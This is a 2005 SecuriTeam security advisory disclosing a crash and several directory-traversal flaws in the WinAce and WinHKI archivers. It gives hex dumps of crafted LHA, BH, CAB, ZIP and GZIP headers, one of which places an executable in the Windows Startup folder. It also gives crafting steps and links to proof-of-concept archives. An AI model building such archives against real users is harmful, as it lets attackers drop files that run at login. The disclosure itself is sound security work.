[NT] Multiple Vulnerabilities in WinAce and WinHKI File Archievers
From: SecuriTeam (support_at_securiteam.com)
Date: 01/09/05
- Previous message: SecuriTeam: "[NEWS] Mozilla XBM DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 9 Jan 2005 14:05:42 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Vulnerabilities in WinAce and WinHKI File Archievers
------------------------------------------------------------------------
SUMMARY
<http://www.webtoolmaster.com> WinAce and <http://www.webtoolmaster.com>
WinHKI are file achievers that supports: CAB, JAR, ZIP, RAR, TAR, GZ, LZA,
LHA, BH, HKI compressions.
Multiple vulnerabilities in WinAce and WinHKI allow a remote attacker to
run arbitrary files on the target's machine.
DETAILS
Vulnerable Systems:
* WinAce Version 1.4d
* WinHKI Version 1.4d
WinHKI - LHA File Incorrect Filename Handling Leads to Crash/Underflow:
This is a normal LHA compressed file header:
00000000 1EFF 2D6C 6830 2D1B 0000 001B 0000 0039 ..-lh0-........9
00000010 7378 3120 0008 5C31 3032 2E68 746D 4543 sx1 ..\102.htmEC
00000020 3C73 6372 6970 7466 3E61 6C65 7274 2829 <scriptf>alert()
00000030 3C2F 7363 7269 7074 3E0D 0A62 5F2D 6C68 </script>..b_-lh
00000040 642D 0000 0000 0000 0000 94A4 8431 1000 d-...........1..
The last byte in the following code, specifies the length of the
compressed file name. Once its smaller than the filename's length WinHKI
crashes:
00000000 1EFF 2D6C 6830 2D1B 0000 001B 0000 0039 ..-lh0-........9
00000010 7378 3120 0020 sx1 .
To recreate this vulnerability we need to do shorten the length of the
filename specified inside the file or to change the byte that sets the
filename's size to a higher value.
For Example:
00000000 1EFF 2D6C 6830 2D1B 0000 001B 0000 0039 ..-lh0-........9
00000010 7378 3120 0020 5C31 3073 7373 7373 7373 sx1 . \10sssssss
00000020 3232 2E68 746D 4543 3C73 6372 6970 7466 22.htmEC<scriptf
00000030 3E61 6C65 7274 2829 3C2F 7363 7269 7074 >alert()</script
00000040 3E0D 0A62 5F2D 6C68 642D 0000 0000 0000 >..b_-lhd-......
00000050 0000 94A4 8431 1000 4C5C 446F 6375 6D65 .....1..L\Docume
Proof of Concept:
An .lha archive that triggers the vulnerability can be found at:
<http://theinsider.deep-ice.com/poc.lha>
http://theinsider.deep-ice.com/poc.lha
WinHKI - BH File Directory Transversal:
This is a normal BH compressed file header:
00000000 484B 4901 1441 0000 FD00 3973 7831 8D34 HKI..A....9sx1.4
00000010 3741 7800 0000 1B00 0000 0500 0000 302E 7Ax...........0.
00000020 6874 6D00 0010 0078 0000 001B 0000 008D htm....x........
00000030 3437 4101 0000 0001 06FF FF00 0000 0000 47A.............
In the following sample, we can see how easy it is to change the path to
anywhere we want, including the All Users start up folder.
00000000 484B 4901 1441 0000 FD00 6C8C 9031 066A HKI..A....l..1.j
00000010 8E05 F600 0000 D300 0000 4000 0000 633A ..........@...c:
00000020 5C64 6F63 756D 657E 315C 616C 6C75 7365 \docume~1\alluse
00000030 7E31 5C73 7461 7274 6D7E 315C 7072 6F67 ~1\startm~1\prog
00000040 7261 6D73 5C73 7461 7274 7570 5C63 6F6F rams\startup\coo
00000050 6C20 2076 6972 7573 6573 2E65 7865 0000 l viruses.exe..
00000060 1000 F600 0000 D300 0000 066A 8E05 0100 ...........j....
All we need to do is cab compress (using WinHKI) a file with a long
name/path and change the path specified inside the file to whatever we
want.
Proof of Concept:
A .bh archive that triggers the vulnerability can be found at:
<http://theinsider.deep-ice.com/poc.bh>
http://theinsider.deep-ice.com/poc.bh
WinHKI - CAB File Directory Transversal:
This is a normal CAB compressed file header:
00000000 4D53 4346 0000 0000 0E30 0F00 0000 0000 MSCF.....0......
00000010 2C00 0000 0000 0000 0301 0100 0100 0000 ,...............
00000020 0000 0000 5800 0000 2000 0100 C8EE 0F00 ....X... .......
00000030 0000 0000 0000 0C2F CC61 2000 7356 5656 ......./.a .sVVV
00000040 5656 5656 5656 5656 5656 5656 5656 5656 VVVVVVVVVVVVVVVV
00000050 5670 352E 6578 6500 5D5B 7CBC 2742 0080 Vp5.exe.][|.'B..
00000060 434B EC5A 7F54 5457 7E7F 33CC C000 036F CK.Z.TTW~.3....o
In the following sample, we can see how easy it is to change the path to
anywhere we want, including the All Users start up folder.
00000000 4D53 4346 0000 0000 0E30 0F00 0000 0000 MSCF.....0......
00000010 2C00 0000 0000 0000 0301 0100 0100 0000 ,...............
00000020 0000 0000 5800 0000 2000 0100 C8EE 0F00 ....X... .......
00000030 0000 0000 0000 0C2F CC61 2000 433A 5C56 ......./.a .C:\V
00000040 5656 5656 5656 5656 5656 5656 5656 5656 VVVVVVVVVVVVVVVV
00000050 5670 352E 6578 6500 5D5B 7CBC 2742 0080 Vp5.exe.][|.'B..
00000060 434B EC5A 7F54 5457 7E7F 33CC C000 036F CK.Z.TTW~.3....o
All we need to do is cab compress (using Microsoft's "makecab" or Winace)
a file with a long name/path and change the path specified inside the file
to whatever we want.
Proof of Concept:
A .cab archive that triggers the vulnerability can be found at:
<http://theinsider.web1000.com/hki_transversal.cab>
http://theinsider.web1000.com/hki_transversal.cab
WinAce & WinHKI - ZIP File Directory Transversal:
This is a normal ZIP compressed file header:
00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..
00000010 F209 3C2F 0F00 C8EE 0F00 0700 0000 7370 ..</..........sp
00000020 352E 6578 65EC 5A7F 5454 577E 7F33 0C30 5.exe.Z.TTW~.3.0
00000030 C0C0 1B94 8926 6A32 2AAE D9FC 206E 2628 .....&j2*... n&(
00000040 2018 1186 4044 7D3A E40D 4940 4304 7CCC ...@D}:..I@C.|.
In the following sample, we can see how easy it is to change the path to
anywhere we want, including the All Users start up folder.
The file name was changed to: /../../sp5.exe
00000000 504B 0304 1400 0200 0800 CC81 0C2F B78F PK.........../..
00000010 F209 3C2F 0F00 C8EE 0F00 1000 0000 7662 ..</..........vb
00000020 2F2E 2E2F 2E2E 2F73 7035 2E65 7865 EC5A /../../sp5.exe.Z
00000030 7F54 5457 7E7F 330C 30C0 C01B 9489 266A .TTW~.3.0.....&j
00000040 322A AED9 FC20 6E26 2820 1811 8640 447D 2*... n&( ...@D}
All we need to do is zip compress (using WinZip, WinRAR, WinAce) a file
with a long name/path and change the path specified inside the file to
whatever we want.
Proof of Concept:
A .ZIP archive that triggers the vulnerability can be found at:
<http://theinsider.web1000.com/WINACE-WINHKI_ZIP_TRANSVERSAL.zip>
http://theinsider.web1000.com/WINACE-WINHKI_ZIP_TRANSVERSAL.zip
WinAce - GZIP File Directory Transversal:
This is a normal GZIP compressed file header:
00000000 1F8B 0808 DC89 9641 0000 7769 6E33 322D .......A..win32-
00000010 7368 656C 6C63 6F64 652E 7064 6600 BCBC shellcode.pdf...
00000020 073C 95FF FB3F 5E66 227B 671C 2487 749C .<...?^f"{g.$.t.
00000030 7D8E 5956 F626 23C9 96BD B790 BD77 F6C8 }.YV.&#......w..
00000040 2622 2264 9411 2111 45F6 5656 4684 28FF &""d..!.E.VVF.(.
In the following sample, we can see how easy it is to change the path to
anywhere we want, including the All Users start up folder.
The file name was changed to: /../../sp5.exe
00000000 1F8B 0808 CE7D A441 0000 2E2E 2F2E 2E2F .....}.A..../../
00000010 2E2E 2F2E 2E2F 2E2E 2F72 6166 692E 6578 ../../../rafi.ex
00000020 6500 B329 4E2E CA2C 2849 B34B CC49 2D2A e..)N..,(I.K.I-*
00000030 D1D0 B4D1 8708 D8F1 7201 0045 5910 EA1B ........r..EY...
00000040 0000 00 ...
All we need to do is GZIP compress (using winace) a file with a long
name/path and change the path specified inside the file to whatever we
want.
Proof of Concept:
A .GZIP archive that triggers the vulnerability can be found at:
<http://theinsider.deep-ice.com/winace_gz_file_transversal.gz>
http://theinsider.deep-ice.com/winace_gz_file_transversal.gz
ADDITIONAL INFORMATION
The information has been provided by <mailto:the_insider@mail.com> Rafel
Ivgi, The-Insider.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NEWS] Mozilla XBM DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
